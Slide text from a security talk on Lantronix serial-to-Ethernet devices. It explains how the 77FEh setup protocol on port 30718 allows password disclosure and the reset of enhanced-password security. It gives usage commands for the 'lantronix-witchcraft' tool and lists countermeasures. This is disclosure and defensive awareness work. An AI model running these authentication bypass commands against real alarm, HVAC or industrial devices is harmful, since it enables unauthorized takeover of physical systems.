If vendors need to expose serial interface to “modern” IP world, they often use ready-made solution like Lantronix. You can find different vendors to use these devices as part of different embedded systems – from alarms to legacy SCADA systems. If you find such devices on the Internet or LAN, the most imporant part is to check if 77FEh is enabled. We will cover already known stuff with 77FEh, but also new interesting findings in owning such devices.
New tool to exploit all of this will be presented as well as counter-measures.
2. 2
Mos
Eisley
Lab
Who are you!?!!??
●
Security Jedi at Diverto
–
Bringing balance to the force
●
Experience
–
Offensive (Penetration tester)
–
Defensive (Developer/System Administrator/...)
–
Have code in: Nmap, Metasploit, OpenVAS, …
–
Author of free software: https://github.com/kost/
●
If you trust in certificates
–
CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
5. 5
Mos
Eisley
Lab
You can find them as integral part
of
●
Alarms
●
HVACs
●
Pool monitoring systems
●
Sprinkler controllers
●
Hacked vacuum cleaners - Roombas
●
Embedded systems
●
Industrial systems
Source:
http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
6. 6
Mos
Eisley
Lab
What they are running actually?
●
OS
–
CoBos (mostly)
–
Evolution OS/Linux
–
ThreadX
–
Linux
●
Support
–
1 or more serial ports
–
Modbus (few models)
–
10/100 Ethernet
9. 9
Mos
Eisley
Lab
Most frequent services Available –
TCP/IP
●
Web (tcp/80)
●
Telnet (tcp/9999)
●
77FEh (tcp-udp/30718)
●
SNMP (udp/161)
Telnet administration interface
What is this?
Mostly information disclosures
Simple web server
Serving applet JAR which talks
to 30718 port
10. 10
Mos
Eisley
Lab
Device Discovery
●
Ask :)
●
Look if you have physical access
●
Passive
●
Active/Scanning
–
Standard port scanning is fine with conservative timing
–
Broadcast UDP to specific Lantronix ports (30718)
●
Beware
–
Version scanning(-sV) or running vulnerability scanners
may misconfigure device
–
11. 11
Mos
Eisley
Lab
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :
12. 12
Mos
Eisley
Lab
So, WTF is 77FEh finally?
●
0x77FE = 30718 (10)
●
TCP/UDP protocol for device setup
–
Proprietary protocol
–
Used by DeviceInstaller (proprietary software from
Lantronix)
●
Designed for
–
Setup of device
–
Administration of device
–
Getting device info
–
Insecurity (sorry, had to write it, you'll see later ;) )
13. 13
Mos
Eisley
Lab
Sample 77FEh communication
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
Query setup request (4)
Query setup response (4) MAC address
of the device (6)
Device type
15. 15
Mos
Eisley
Lab
Previous – work
●
Metasploit
–
Rob Vinson
●
http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
●
https://github.com/robvinson/metasploit-modules
–
Metasploit modules for simple passwords by jgor
●
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
●
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
●
Tools
–
Simple C program by jgor
●
https://github.com/jgor/lantronix-telnet-pw
16. 16
Mos
Eisley
Lab
But...
●
Simple password is not set
●
Device still asks for password
●
Further digging
–
Enhanced password in place
–
You cannot get/reset the enhanced password
easily
–
Length is bigger (4->16)
–
Challenge!!!
17. 17
Mos
Eisley
Lab
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type Simple Password Enhanced
Password
Length 4 16
Visible in query
setup
yes no
23. 23
Mos
Eisley
Lab
Enhanced password gone
no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode
25. 25
Mos
Eisley
Lab
New tool: lantronix-witchcraft
●
77FEh protocol implementation
●
77FEh security related utility
●
All the tricks mentioned implemented
●
Free software: GPL2
●
Requirement: Perl
●
Available at
–
https://github.com/kost/lantronix-witchcraft
26. 26
Mos
Eisley
Lab
Basic usage:
●
Display Mac address:
–
./lantronix-witchcraft.pl -Q <ip>
●
Display Simple Password (up to 4 characters)
–
./lantronix-witchcraft.pl -P <ip>
●
Reset Security record (together with enhanced password)
–
./lantronix-witchcraft.pl -E <ip>
●
Reset Security record without AES (with enhanced
password)
–
./lantronix-witchcraft.pl -S <ip>
●
Dump setup records
–
./lantronix-witchcraft.pl -G -D <ip>
27. 27
Mos
Eisley
Lab
Brave enough?
●
One command to rule them all
●
Display Mac address and simple password, dump setup
records, reset security records together with enhanced
password:
–
–
./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>
●
29. 29
Mos
Eisley
Lab
Correct way
●
Ask
–
Someone responsible if they could have something like that
●
Send broadcast query packet to 77FEh
●
Identify ports 30718 open (TCP or UDP)
●
Dump setup records
●
Play ;)
●
Check if it is still working...
–
If yes, perfect
–
If not: huh, but you should restore setup records somehow ;)
30. 30
Mos
Eisley
Lab
It's not about Lantronix...
●
...they warned the vendors about it in their
documentation
Source: Lantronix documentation
31. 31
Mos
Eisley
Lab
Disclosure Problem
●
It's more about vendors who implement
Lantronix in their devices
●
Whom to report?
–
Lantronix – I guess they know their protocol ;)
–
OEMs – hard to find all their customers ;)
●
Awareness
–
Conference
–
Tools
33. 33
Mos
Eisley
Lab
Recommendations
●
Have some other device to VPN/SSL tunnel
the services
●
Telnet only through VPN or other secure
channel to administration interface
●
Disable 77FEh if not needed
●
Filter out 77FEh on network devices to only
allowed ones
●
Disable other unneccesary services (SNMP,
telnet, etc).
35. 35
Mos
Eisley
Lab
Summary
●
There are ways to pass beyond authentication (if 77FEh is enabled)
–
Simple passwords
–
Enhanced passwords
●
Tools
–
Metasploit Lantronix modules
–
https://github.com/kost/lantronix-witchcraft
●
Recommendations
–
Disable 77FEh if not needed or Filter out 77FEh on network devices to only
allowed ones
–
Tunnel VPN/SSL all communication to these devices
●
Future
–
There are things to research: way to obtain enhanced password or AES keys
for example
36. 36
Mos
Eisley
Lab
Acknowledgements - Thanks
●
Previous work (Simple Passwords)
–
Rob Vinson
●
http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
●
https://github.com/robvinson/metasploit-modules
–
Metasploit modules for simple passwords by jgor
●
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
●
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
●
https://github.com/jgor/lantronix-telnet-pw
●
Colleagues
–
Dalibor Dosegović, hardware wizard